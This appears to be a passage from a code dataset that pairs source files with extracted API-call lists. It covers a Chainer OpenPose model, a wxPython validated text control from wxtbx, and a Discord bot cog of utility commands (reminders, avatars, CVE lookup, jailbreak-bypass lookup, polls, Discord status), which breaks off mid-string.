stride=1, pad=3)\n', (10577, 10638), True, 'import chainer.links as L\n'), ((10692, 10768), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (10707, 10768), True, 'import chainer.links as L\n'), ((10822, 10898), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (10837, 10898), True, 'import chainer.links as L\n'), ((10952, 11028), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (10967, 11028), True, 'import chainer.links as L\n'), ((11082, 11158), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(1)', 'stride': '(1)', 'pad': '(0)'}), '(in_channels=128, out_channels=128, ksize=1, stride=1, pad=0)\n', (11097, 11158), True, 'import chainer.links as L\n'), ((11212, 11287), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(19)', 'ksize': '(1)', 'stride': '(1)', 'pad': '(0)'}), '(in_channels=128, out_channels=19, ksize=1, stride=1, pad=0)\n', (11227, 11287), True, 'import chainer.links as L\n'), ((11363, 11439), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(185)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=185, out_channels=128, ksize=7, stride=1, pad=3)\n', (11378, 11439), True, 'import chainer.links as L\n'), ((11493, 11569), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), 
'(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (11508, 11569), True, 'import chainer.links as L\n'), ((11623, 11699), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (11638, 11699), True, 'import chainer.links as L\n'), ((11753, 11829), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (11768, 11829), True, 'import chainer.links as L\n'), ((11883, 11959), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (11898, 11959), True, 'import chainer.links as L\n'), ((12013, 12089), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(1)', 'stride': '(1)', 'pad': '(0)'}), '(in_channels=128, out_channels=128, ksize=1, stride=1, pad=0)\n', (12028, 12089), True, 'import chainer.links as L\n'), ((12143, 12218), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(38)', 'ksize': '(1)', 'stride': '(1)', 'pad': '(0)'}), '(in_channels=128, out_channels=38, ksize=1, stride=1, pad=0)\n', (12158, 12218), True, 'import chainer.links as L\n'), ((12272, 12348), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(185)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=185, out_channels=128, ksize=7, stride=1, pad=3)\n', (12287, 12348), True, 'import chainer.links as L\n'), ((12402, 12478), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 
'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (12417, 12478), True, 'import chainer.links as L\n'), ((12532, 12608), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (12547, 12608), True, 'import chainer.links as L\n'), ((12662, 12738), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (12677, 12738), True, 'import chainer.links as L\n'), ((12792, 12868), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (12807, 12868), True, 'import chainer.links as L\n'), ((12922, 12998), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(1)', 'stride': '(1)', 'pad': '(0)'}), '(in_channels=128, out_channels=128, ksize=1, stride=1, pad=0)\n', (12937, 12998), True, 'import chainer.links as L\n'), ((13052, 13127), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(19)', 'ksize': '(1)', 'stride': '(1)', 'pad': '(0)'}), '(in_channels=128, out_channels=19, ksize=1, stride=1, pad=0)\n', (13067, 13127), True, 'import chainer.links as L\n'), ((145, 186), 'pkg_resources.get_distribution', 'pkg_resources.get_distribution', (['"""chainer"""'], {}), "('chainer')\n", (175, 186), False, 'import itertools, pkg_resources, sys\n'), ((13223, 13277), 'chainer.dataset.get_dataset_directory', 'chainer.dataset.get_dataset_directory', (['"""openpose/pose"""'], {}), "('openpose/pose')\n", (13260, 13277), False, 'import 
chainer\n'), ((13307, 13355), 'os.path.join', 'os.path.join', (['data_dir', 'models[pretrained_model]'], {}), '(data_dir, models[pretrained_model])\n', (13319, 13355), False, 'import os\n'), ((13707, 13753), 'chainer.serializers.load_npz', 'chainer.serializers.load_npz', (['model_path', 'self'], {}), '(model_path, self)\n', (13735, 13753), False, 'import chainer\n'), ((13958, 14010), 'chainer.serializers.load_npz', 'chainer.serializers.load_npz', (['pretrained_model', 'self'], {}), '(pretrained_model, self)\n', (13986, 14010), False, 'import chainer\n'), ((13409, 13436), 'os.path.dirname', 'os.path.dirname', (['model_path'], {}), '(model_path)\n', (13424, 13436), False, 'import os\n'), ((13824, 13856), 'os.path.exists', 'os.path.exists', (['pretrained_model'], {}), '(pretrained_model)\n', (13838, 13856), False, 'import os\n'), ((478, 513), 'pkg_resources.find_distributions', 'pkg_resources.find_distributions', (['_'], {}), '(_)\n', (510, 513), False, 'import itertools, pkg_resources, sys\n')] |
from __future__ import absolute_import, division, print_function
from wxtbx import phil_controls
import wxtbx
from libtbx.utils import Abort, to_unicode, to_str
from libtbx import Auto
import wx
import sys
class ValidatedTextCtrl(wx.TextCtrl, phil_controls.PhilCtrl):
  """Base class for text controls whose contents represent a validated
  PHIL parameter value.

  Subclasses must implement CreateValidator(), FormatValue(), and
  GetPhilValue() to define the accepted value type and its string form.
  Validation fires when the user presses Enter or the control loses focus.
  """
  def __init__(self, *args, **kwds):
    # Withhold any initial value until the validator and event bindings
    # are installed, then apply it via SetValue() at the end.
    saved_value = None
    if (kwds.get('value', "") != ""):
      saved_value = kwds['value']
      kwds['value'] = ""
    super(ValidatedTextCtrl, self).__init__(*args, **kwds)
    font = wx.Font(wxtbx.default_font_size, wx.MODERN, wx.NORMAL, wx.NORMAL)
    self.SetFont(font)
    style = self.GetWindowStyle()
    if (not style & wx.TE_PROCESS_ENTER):
      # wx.EVT_TEXT_ENTER is only delivered when TE_PROCESS_ENTER is set.
      style |= wx.TE_PROCESS_ENTER
      self.SetWindowStyle(style)
    self.SetValidator(self.CreateValidator())
    self.Bind(wx.EVT_TEXT_ENTER, self.OnEnter, self)
    self.Bind(wx.EVT_KILL_FOCUS, self.OnFocusLost, self)
    if saved_value is not None:
      if (type(saved_value) == str):
        # FIX: previously assigned to a dead local ('save_value'), which
        # silently discarded the unicode conversion.
        saved_value = to_unicode(saved_value)
      self.SetValue(saved_value)

  def GetValue(self):
    """Return the control's text, normalized via to_str on unicode builds."""
    val = wx.TextCtrl.GetValue(self)
    if wxtbx.is_unicode_build():
      return to_str(val)
    else :
      assert isinstance(val, str)
      return val

  def OnEnter(self, evt=None):
    #self.Validate()
    self.DoSendEvent()

  def OnFocusLost(self, event):
    self.DoSendEvent()
    event.Skip()  # allow default focus-loss processing to continue

  def CreateValidator(self):
    """Subclass hook: return the validator instance for this control."""
    raise NotImplementedError()

  def Validate(self):
    # XXX why doesn't self.Validate() work?
    if self.GetValidator().Validate(self.GetParent()):
      return True
    else :
      raise Abort()

  def FormatValue(self, value):
    """Subclass hook: convert a PHIL value to its display string."""
    raise NotImplementedError()

  def GetPhilValue(self):
    """Subclass hook: parse and return the current PHIL value."""
    raise NotImplementedError()

  def GetStringValue(self):
    """Return the formatted string value, Auto, or None if unset."""
    value = self.GetPhilValue()
    if (value is not None) and (value is not Auto):
      return self.FormatValue(value)
    elif (self.UseAuto()) or (value is Auto):
      return Auto
    return None

  def Enable(self, enable=True):
    """Enable/disable the control, greying out the background when disabled."""
    wx.TextCtrl.Enable(self, enable)
    if enable :
      self.SetBackgroundColour((255,255,255))
    else :
      self.SetBackgroundColour((200,200,200))
class TextCtrlValidator(wx.PyValidator):
  """Validator for ValidatedTextCtrl: reformats the control's text via
  CheckFormat() and flags bad input by turning the control red.

  Subclasses implement CheckFormat() to parse/normalize the raw text
  (raising on invalid input).
  """
  def __init__(self):
    wx.PyValidator.__init__(self)
    self.Bind(wx.EVT_TEXT_ENTER, self.OnEnter)
  def Clone(self):
    # wx requires validators to be clonable; each control gets its own copy.
    return self.__class__()
  def TransferToWindow(self):
    return True
  def TransferFromWindow(self):
    return True
  def CheckFormat(self, value):
    # Subclass hook: return the normalized text, or raise on bad input.
    raise NotImplementedError()
  def Validate(self, win):
    ctrl = self.GetWindow()
    try :
      value = to_unicode(ctrl.GetValue())
      # if isinstance(value, str):
      #  value = value.decode("utf-8")
      if (value == ""):
        # Empty text is always acceptable; restore the normal background.
        ctrl.SetBackgroundColour(
          wx.SystemSettings_GetColour(wx.SYS_COLOUR_WINDOW))
        return True
      reformatted = self.CheckFormat(value)
      if isinstance(reformatted, str):
        reformatted = to_unicode(reformatted)
      # Write the normalized representation back into the control.
      ctrl.SetValue(reformatted)
      ctrl.SetBackgroundColour(
        wx.SystemSettings_GetColour(wx.SYS_COLOUR_WINDOW))
      #ctrl.SetFocus()
      ctrl.Refresh()
      return True
    except NotImplementedError :
      raise
    except Exception as e :
      # Any other exception from CheckFormat() means the input was invalid:
      # show a message box and mark the control red.
      ctrl_name = str(ctrl.GetName())
      msg = "Inappropriate value given for \"%s\": %s" %(ctrl_name,str(e))
      if (type(e).__name__ == "UnicodeEncodeError"):
        msg = ("You have entered characters which cannot be converted to "+
          "Latin characters in the control '%s'; due to limitations of the "+
          "underlying code, only the standard UTF-8 character set is "+
          "allowed.") % ctrl_name
      wx.MessageBox(caption="Format error", message=msg)
      ctrl.SetBackgroundColour("red")
      # Don't set focus on Windows since messagebox is modal and thus
      # would automatically recapture focus leading to an endless UI loop
      if (sys.platform != 'win32'):
        ctrl.SetFocus()
      ctrl.Refresh()
      return False
  def OnEnter(self, event):
    #self.Validate(None)
    ctrl = self.GetWindow()
    ctrl.DoSendEvent()
| [
"libtbx.utils.to_unicode",
"libtbx.utils.Abort",
"wx.TextCtrl.Enable",
"wx.TextCtrl.GetValue",
"wx.SystemSettings_GetColour",
"libtbx.utils.to_str",
"wx.MessageBox",
"wxtbx.is_unicode_build",
"wx.Font",
"wx.PyValidator.__init__"
] | [((497, 562), 'wx.Font', 'wx.Font', (['wxtbx.default_font_size', 'wx.MODERN', 'wx.NORMAL', 'wx.NORMAL'], {}), '(wxtbx.default_font_size, wx.MODERN, wx.NORMAL, wx.NORMAL)\n', (504, 562), False, 'import wx\n'), ((1066, 1092), 'wx.TextCtrl.GetValue', 'wx.TextCtrl.GetValue', (['self'], {}), '(self)\n', (1086, 1092), False, 'import wx\n'), ((1100, 1124), 'wxtbx.is_unicode_build', 'wxtbx.is_unicode_build', ([], {}), '()\n', (1122, 1124), False, 'import wxtbx\n'), ((1987, 2019), 'wx.TextCtrl.Enable', 'wx.TextCtrl.Enable', (['self', 'enable'], {}), '(self, enable)\n', (2005, 2019), False, 'import wx\n'), ((2207, 2236), 'wx.PyValidator.__init__', 'wx.PyValidator.__init__', (['self'], {}), '(self)\n', (2230, 2236), False, 'import wx\n'), ((1139, 1150), 'libtbx.utils.to_str', 'to_str', (['val'], {}), '(val)\n', (1145, 1150), False, 'from libtbx.utils import Abort, to_unicode, to_str\n'), ((1587, 1594), 'libtbx.utils.Abort', 'Abort', ([], {}), '()\n', (1592, 1594), False, 'from libtbx.utils import Abort, to_unicode, to_str\n'), ((976, 999), 'libtbx.utils.to_unicode', 'to_unicode', (['saved_value'], {}), '(saved_value)\n', (986, 999), False, 'from libtbx.utils import Abort, to_unicode, to_str\n'), ((2920, 2943), 'libtbx.utils.to_unicode', 'to_unicode', (['reformatted'], {}), '(reformatted)\n', (2930, 2943), False, 'from libtbx.utils import Abort, to_unicode, to_str\n'), ((3017, 3066), 'wx.SystemSettings_GetColour', 'wx.SystemSettings_GetColour', (['wx.SYS_COLOUR_WINDOW'], {}), '(wx.SYS_COLOUR_WINDOW)\n', (3044, 3066), False, 'import wx\n'), ((3635, 3685), 'wx.MessageBox', 'wx.MessageBox', ([], {'caption': '"""Format error"""', 'message': 'msg'}), "(caption='Format error', message=msg)\n", (3648, 3685), False, 'import wx\n'), ((2744, 2793), 'wx.SystemSettings_GetColour', 'wx.SystemSettings_GetColour', (['wx.SYS_COLOUR_WINDOW'], {}), '(wx.SYS_COLOUR_WINDOW)\n', (2771, 2793), False, 'import wx\n')] |
import base64
import datetime
import io
import json
import traceback
import aiohttp
import discord
import pytimeparse
from data.services.guild_service import guild_service
from discord.commands import Option, slash_command, message_command, user_command
from discord.ext import commands
from discord.utils import format_dt
from PIL import Image
from utils.autocompleters import (bypass_autocomplete, get_ios_cfw,
rule_autocomplete)
from utils.config import cfg
from utils.context import BlooContext
from utils.logger import logger
from utils.menu import BypassMenu
from utils.permissions.checks import (PermissionsFailure, mod_and_up,
whisper, whisper_in_general)
from utils.permissions.permissions import permissions
from utils.permissions.slash_perms import slash_perms
from yarl import URL
class PFPView(discord.ui.View):
    """Interaction view for avatar embeds; disables itself after 30 seconds."""

    def __init__(self, ctx: BlooContext):
        super().__init__(timeout=30)
        self.ctx = ctx

    async def on_timeout(self):
        """Grey out every child control and push the updated view."""
        for item in self.children:
            item.disabled = True
        await self.ctx.respond_or_edit(view=self)
class PFPButton(discord.ui.Button):
    """Button that toggles an avatar embed between a member's server-specific
    avatar and their global (or default) avatar."""

    def __init__(self, ctx: BlooContext, member: discord.Member):
        super().__init__(label="Show other avatar", style=discord.ButtonStyle.primary)
        self.ctx = ctx
        self.member = member
        # False -> currently showing the global avatar; True -> guild avatar.
        self.other = False

    async def callback(self, interaction: discord.Interaction):
        # Only the original invoker may press the button.
        if interaction.user != self.ctx.author:
            return

        if self.other:
            avatar = self.member.avatar or self.member.default_avatar
        else:
            avatar = self.member.guild_avatar
        self.other = not self.other

        embed = interaction.message.embeds[0]
        embed.set_image(url=avatar.replace(size=4096))

        def fmt(format_):
            return f"[{format_}]({avatar.replace(format=format_, size=4096)})"

        # Animated avatars additionally offer a GIF download link.
        if avatar.is_animated():
            formats = ["gif", "png", "jpeg", "webp"]
        else:
            formats = ["png", "jpeg", "webp"]
        embed.description = f"View As\n {' '.join([fmt(format_) for format_ in formats])}"

        await interaction.response.edit_message(embed=embed)
class BypassDropdown(discord.ui.Select):
    """Select menu listing apps; picking one opens its bypass paginator."""

    def __init__(self, ctx, apps):
        self.ctx = ctx
        # Index the apps by bundle ID so the selected value maps back to
        # the full app record in callback().
        self.apps = {}
        options = []
        for app in apps:
            bundle_id = app.get("bundleId")
            self.apps[bundle_id] = app
            options.append(discord.SelectOption(
                label=app.get("name"),
                value=bundle_id,
                description="Bypasses found" if app.get("bypasses") else "No bypasses found",
                emoji='<:appstore:392027597648822281>'))
        super().__init__(placeholder='Pick an app...',
                         min_values=1, max_values=1, options=options)

    async def callback(self, interaction):
        # Ignore clicks from anyone but the original invoker.
        if interaction.user != self.ctx.author:
            return
        self.view.stop()
        selected_app = self.apps.get(self.values[0])
        self.ctx.app = selected_app
        if not selected_app.get("bypasses"):
            await self.ctx.send_error("No bypasses found for this app!")
            return

        menu = BypassMenu(self.ctx, selected_app.get("bypasses"), per_page=1,
                          page_formatter=format_bypass_page, whisper=self.ctx.whisper)
        await menu.start()

    async def on_timeout(self):
        """Grey out the dropdown once the interaction window expires."""
        self.disabled = True
        self.placeholder = "Timed out"
        await self.ctx.edit(view=self._view)
def format_bypass_page(ctx, entries, current_page, all_pages):
    """Render one page of the bypass paginator as a Discord embed.

    ``entries`` holds exactly one bypass dict (the menu uses per_page=1);
    the bypass is also stashed on ``ctx.current_bypass`` for later use.
    """
    bypass = entries[0]
    ctx.current_bypass = bypass

    embed = discord.Embed(title=ctx.app.get("name"), color=discord.Color.blue())
    embed.set_thumbnail(url=ctx.app.get("icon"))
    embed.description = f"You can use **{bypass.get('name')}**!"

    if bypass.get("notes") is not None:
        # A note usually signals a caveat, so switch the accent color.
        embed.add_field(name="Note", value=bypass.get('notes'))
        embed.color = discord.Color.orange()

    if bypass.get("version") is not None:
        embed.add_field(name="Supported versions",
                        value=f"This bypass works on versions {bypass.get('version')} of the app")

    embed.set_footer(
        text=f"Powered by ios.cfw.guide • Bypass {current_page} of {len(all_pages)}")
    return embed
class Misc(commands.Cog):
    """Miscellaneous utility commands: reminders, emoji enlarging, avatar
    viewing, CVE lookups, jailbreak-detection bypasses, rule/topic embeds,
    polls, and Discord status."""

    def __init__(self, bot):
        self.bot = bot
        # Rate limit for non-mod /jumbo usage outside the botspam channel:
        # 3 invocations per 15 seconds, per channel.
        self.spam_cooldown = commands.CooldownMapping.from_cooldown(
            3, 15.0, commands.BucketType.channel)

        # emojis.json maps each Unicode emoji to a base64-encoded image
        # (produced by scrape_emojis.py); required for /jumbo.
        try:
            with open('emojis.json') as f:
                self.emojis = json.loads(f.read())
        except:
            raise Exception(
                "Could not find emojis.json. Make sure to run scrape_emojis.py")

    @whisper()
    @slash_command(guild_ids=[cfg.guild_id], description="Send yourself a reminder after a given time gap")
    async def remindme(self, ctx: BlooContext, reminder: Option(str, description="What do you want to be reminded?"), duration: Option(str, description="When do we remind you? (i.e 1m, 1h, 1d)")):
        """Sends you a reminder after a given time gap

        Example usage
        -------------
        /remindme 1h bake the cake

        Parameters
        ----------
        duration : str
            "After when to send the reminder"
        reminder : str
            "What to remind you of"

        """
        now = datetime.datetime.now()
        delta = pytimeparse.parse(duration)
        if delta is None:
            raise commands.BadArgument(
                "Please give me a valid time to remind you! (i.e 1h, 30m)")

        time = now + datetime.timedelta(seconds=delta)
        if time < now:
            raise commands.BadArgument("Time has to be in the future >:(")
        # Escape markdown so the reminder text can't break the embed later.
        reminder = discord.utils.escape_markdown(reminder)

        ctx.tasks.schedule_reminder(ctx.author.id, reminder, time)
        # natural_time = humanize.naturaldelta(
        #     delta, minimum_unit='seconds')
        embed = discord.Embed(title="Reminder set", color=discord.Color.random(
        ), description=f"We'll remind you {discord.utils.format_dt(time, style='R')}")
        await ctx.respond(embed=embed, ephemeral=ctx.whisper, delete_after=5)

    @slash_command(guild_ids=[cfg.guild_id], description="Post large version of a given emoji")
    async def jumbo(self, ctx: BlooContext, emoji: str):
        """Posts large version of a given emoji

        Example usage
        -------------
        /jumbo <emote>

        Parameters
        ----------
        emoji : str
            "Emoji to enlarge"

        """
        # non-mod users will be ratelimited
        bot_chan = guild_service.get_guild().channel_botspam
        if not permissions.has(ctx.guild, ctx.author, 5) and ctx.channel.id != bot_chan:
            bucket = self.spam_cooldown.get_bucket(ctx.interaction)
            if bucket.update_rate_limit():
                raise commands.BadArgument("This command is on cooldown.")

        # is this a regular Unicode emoji?
        try:
            em = await commands.PartialEmojiConverter().convert(ctx, emoji)
        except commands.PartialEmojiConversionFailure:
            em = emoji
        if isinstance(em, str):
            # Unicode emoji: look up the scraped base64 image and repost it.
            async with ctx.typing():
                emoji_url_file = self.emojis.get(em)
                if emoji_url_file is None:
                    raise commands.BadArgument(
                        "Couldn't find a suitable emoji.")
                im = Image.open(io.BytesIO(base64.b64decode(emoji_url_file)))
                image_conatiner = io.BytesIO()
                im.save(image_conatiner, 'png')
                image_conatiner.seek(0)
                _file = discord.File(image_conatiner, filename='image.png')
                await ctx.respond(file=_file)
        else:
            # Custom server emoji: Discord already hosts a full-size image.
            await ctx.respond(em.url)

    @whisper()
    @slash_command(guild_ids=[cfg.guild_id], description="Get avatar of another user or yourself.")
    async def avatar(self, ctx: BlooContext, member: Option(discord.Member, description="User to get avatar of", required=False)) -> None:
        """Posts large version of a user's avatar

        Example usage
        -------------
        /avatar member:<member>

        Parameters
        ----------
        member : discord.Member, optional
            "Member to get avatar of"

        """
        if member is None:
            member = ctx.author

        await self.handle_avatar(ctx, member)

    @whisper()
    @user_command(guild_ids=[cfg.guild_id], name="View avatar")
    async def avatar_rc(self, ctx: BlooContext, member: discord.Member):
        # Right-click (user context menu) entry point for avatar viewing.
        await self.handle_avatar(ctx, member)

    @whisper()
    @message_command(guild_ids=[cfg.guild_id], name="View avatar")
    async def avatar_msg(self, ctx: BlooContext, message: discord.Message):
        # Message context-menu entry point: show the message author's avatar.
        await self.handle_avatar(ctx, message.author)

    async def handle_avatar(self, ctx, member: discord.Member):
        """Build and send the avatar embed (with format links and, when a
        guild-specific avatar exists, a toggle button)."""
        embed = discord.Embed(title=f"{member}'s avatar")
        animated = ["gif", "png", "jpeg", "webp"]
        not_animated = ["png", "jpeg", "webp"]

        avatar = member.avatar or member.default_avatar

        def fmt(format_):
            return f"[{format_}]({avatar.replace(format=format_, size=4096)})"

        if member.display_avatar.is_animated():
            embed.description = f"View As\n {' '.join([fmt(format_) for format_ in animated])}"
        else:
            embed.description = f"View As\n {' '.join([fmt(format_) for format_ in not_animated])}"

        embed.set_image(url=avatar.replace(size=4096))
        embed.color = discord.Color.random()

        view = PFPView(ctx)
        if member.guild_avatar is not None:
            # Offer a toggle between the server avatar and the global one.
            view.add_item(PFPButton(ctx, member))

        view.message = await ctx.respond(embed=embed, ephemeral=ctx.whisper, view=view)

    @whisper_in_general()
    @slash_command(guild_ids=[cfg.guild_id], description="View information about a CVE")
    async def cve(self, ctx: BlooContext, id: str):
        """View information about a CVE

        Example usage
        -------------
        /cve <id>

        Parameters
        ----------
        id : str
            "ID of CVE to lookup"

        """
        try:
            async with aiohttp.ClientSession() as client:
                async with client.get(URL(f'https://cve.circl.lu/api/cve/{id}', encoded=True)) as resp:
                    response = json.loads(await resp.text())
                    embed = discord.Embed(title=response.get(
                        'id'), color=discord.Color.random())
                    embed.description = response.get('summary')
                    embed.add_field(name="Published", value=response.get(
                        'Published'), inline=True)
                    embed.add_field(name="Last Modified",
                                    value=response.get('Modified'), inline=True)
                    embed.add_field(name="Complexity", value=response.get(
                        'access').get('complexity').title(), inline=False)
                    embed.set_footer(text="Powered by https://cve.circl.lu")
                    await ctx.respond(embed=embed, ephemeral=ctx.whisper)
        except Exception:
            # Any failure (bad ID, network error, schema change) is surfaced
            # as a single user-friendly error.
            raise commands.BadArgument("Could not find CVE.")

    @whisper_in_general()
    @slash_command(guild_ids=[cfg.guild_id], description="Find out how to bypass jailbreak detection for an app")
    async def bypass(self, ctx: BlooContext, app: Option(str, description="Name of the app", autocomplete=bypass_autocomplete)):
        # Look up the app in the ios.cfw.guide dataset by substring match.
        await ctx.defer(ephemeral=ctx.whisper)
        data = await get_ios_cfw()
        bypasses = data.get('bypass')
        matching_apps = [body for _, body in bypasses.items() if app.lower() in body.get("name").lower()]

        if not matching_apps:
            raise commands.BadArgument(
                "The API does not recognize that app or there are no bypasses available.")

        # matching_app = bypasses[matching_apps[0]]
        # print(matching_app)
        if len(matching_apps) > 1:
            # Ambiguous query: let the user pick from a dropdown (max 25,
            # the Discord select-menu option limit).
            view = discord.ui.View(timeout=30)
            apps = matching_apps[:25]
            apps.sort(key=lambda x: x.get("name"))
            menu = BypassDropdown(ctx, apps)
            view.add_item(menu)
            view.on_timeout = menu.on_timeout
            embed = discord.Embed(
                description="Which app would you like to view bypasses for?", color=discord.Color.blurple())
            await ctx.respond(embed=embed, view=view, ephemeral=ctx.whisper)
        else:
            ctx.app = matching_apps[0]
            bypasses = ctx.app.get("bypasses")
            if not bypasses or bypasses is None or bypasses == [None]:
                raise commands.BadArgument(
                    f"{ctx.app.get('name')} has no bypasses.")

            menu = BypassMenu(ctx, ctx.app.get(
                "bypasses"), per_page=1, page_formatter=format_bypass_page, whisper=ctx.whisper)
            await menu.start()

    @slash_command(guild_ids=[cfg.guild_id], description="Post the embed for one of the rules")
    async def rule(self, ctx: BlooContext, title: Option(str, autocomplete=rule_autocomplete), user_to_mention: Option(discord.Member, description="User to mention in the response", required=False)):
        # Resolve the rule title leniently: exact match, case-insensitive
        # match, or the truncated "title - description" autocomplete form.
        if title not in self.bot.rule_cache.cache:
            potential_rules = [r for r in self.bot.rule_cache.cache if title.lower() == r.lower(
            ) or title.strip() == f"{r} - {self.bot.rule_cache.cache[r].description}"[:100].strip()]
            if not potential_rules:
                raise commands.BadArgument(
                    "Rule not found! Title must match one of the embeds exactly, use autocomplete to help!")
            title = potential_rules[0]

        embed = self.bot.rule_cache.cache[title]

        if user_to_mention is not None:
            title = f"Hey {user_to_mention.mention}, have a look at this!"
        else:
            title = None

        await ctx.respond_or_edit(content=title, embed=embed)

    @slash_command(guild_ids=[cfg.guild_id], description="Get the topic for a channel")
    async def topic(self, ctx: BlooContext, channel: Option(discord.TextChannel, description="Channel to get the topic from", required=False), user_to_mention: Option(discord.Member, description="User to mention in the response", required=False)):
        """get the channel's topic"""
        channel = channel or ctx.channel
        if channel.topic is None:
            raise commands.BadArgument(f"{channel.mention} has no topic!")

        if user_to_mention is not None:
            title = f"Hey {user_to_mention.mention}, have a look at this!"
        else:
            title = None

        embed = discord.Embed(title=f"#{channel.name}'s topic",
                              description=channel.topic, color=discord.Color.blue())
        await ctx.respond_or_edit(content=title, embed=embed)

    @mod_and_up()
    @slash_command(guild_ids=[cfg.guild_id], description="Start a poll", permissions=slash_perms.mod_and_up())
    async def poll(self, ctx: BlooContext, question: str, channel: Option(discord.TextChannel, required=False, description="Where to post the message") = None):
        # Post the question as an embed and seed it with up/down reactions.
        if channel is None:
            channel = ctx.channel

        embed=discord.Embed(description=question, color=discord.Color.random())
        embed.timestamp = datetime.datetime.now()
        embed.set_footer(text=f"Poll started by {ctx.author}")

        message = await channel.send(embed=embed)
        emojis = ['⬆️', '⬇️']

        for emoji in emojis:
            await message.add_reaction(emoji)

        ctx.whisper = True
        await ctx.send_success("Done!")

    @slash_command(guild_ids=[cfg.guild_id], description="View the status of various Discord features")
    @commands.guild_only()
    async def dstatus(self, ctx):
        # Pull component health and the latest incident from discordstatus.com
        # and summarize both in one embed.
        async with aiohttp.ClientSession() as session:
            async with session.get("https://discordstatus.com/api/v2/components.json") as resp:
                if resp.status == 200:
                    components = await resp.json()

        async with aiohttp.ClientSession() as session:
            async with session.get("https://discordstatus.com/api/v2/incidents.json") as resp:
                if resp.status == 200:
                    incidents = await resp.json()

        # NOTE(review): these positional indices assume a fixed component
        # ordering in the discordstatus.com response — fragile; confirm.
        api_status = components.get('components')[0].get('status').title()  # API
        mp_status = components.get('components')[4].get('status').title()  # Media Proxy
        pn_status = components.get('components')[6].get('status').title()  # Push Notifications
        s_status = components.get('components')[8].get('status').title()  # Search
        v_status = components.get('components')[11].get('status').title()  # Voice
        cf_status = components.get('components')[2].get('status').title()  # Cloudflare

        title = "All Systems Operational" if api_status == "Operational" and mp_status == "Operational" and pn_status == "Operational" and s_status == "Operational" and v_status == "Operational" and cf_status == "Operational" else "Known Incident"
        color = discord.Color.green() if title == "All Systems Operational" else discord.Color.orange()

        last_incident = incidents.get('incidents')[0].get('name')
        last_status = incidents.get('incidents')[0].get('status').title()
        last_created = datetime.datetime.strptime(incidents.get('incidents')[0].get('created_at'), "%Y-%m-%dT%H:%M:%S.%f%z")
        last_update = datetime.datetime.strptime(incidents.get('incidents')[0].get('updated_at'), "%Y-%m-%dT%H:%M:%S.%f%z")
        last_impact = incidents.get('incidents')[0].get('impact')

        online = '<:status_online:942288772551278623>'
        offline = '<:status_dnd:942288811818352652>'

        incident_icons = {'none': '<:status_offline:942288832051679302>',
                          'maintenance': '<:status_total:942290485916073995>',
                          'minor': '<:status_idle:942288787000680499>',
                          'major': '<:status_dnd:942288811818352652>',
                          'critical': '<:status_dnd:942288811818352652>'}

        embed = discord.Embed(title=title, description=f"""
{online if api_status == 'Operational' else offline} **API:** {api_status}
{online if mp_status == 'Operational' else offline} **Media Proxy:** {mp_status}
{online if pn_status == 'Operational' else offline} **Push Notifications:** {pn_status}
{online if s_status == 'Operational' else offline} **Search:** {s_status}
